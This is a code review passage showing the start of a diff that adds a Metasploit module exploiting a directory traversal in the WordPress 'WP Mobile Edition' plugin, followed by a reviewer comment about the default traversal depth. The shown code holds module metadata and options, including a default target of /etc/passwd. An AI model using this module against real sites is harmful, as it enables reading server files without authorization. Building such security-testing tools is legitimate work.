modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb

```diff
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress Mobile Edition File Read Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in WordPress Plugin
+        "WP Mobile Edition" version 2.2.7, allowing to read arbitrary files with the
+        web server privileges. Stay tuned to the correct value in TARGETURI.
+      },
+      'References'     =>
+        [
+          ['EDB', '36733'],
+          ['WPVDB', '7898']
+        ],
+      'Author'         =>
+        [
+          'Khwanchai Kaewyos', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ])
```

Comment:
in my default install this has to be 7. Can we raise this value? In most unix installs it should be irrelavant if the traversal is deeper than the root.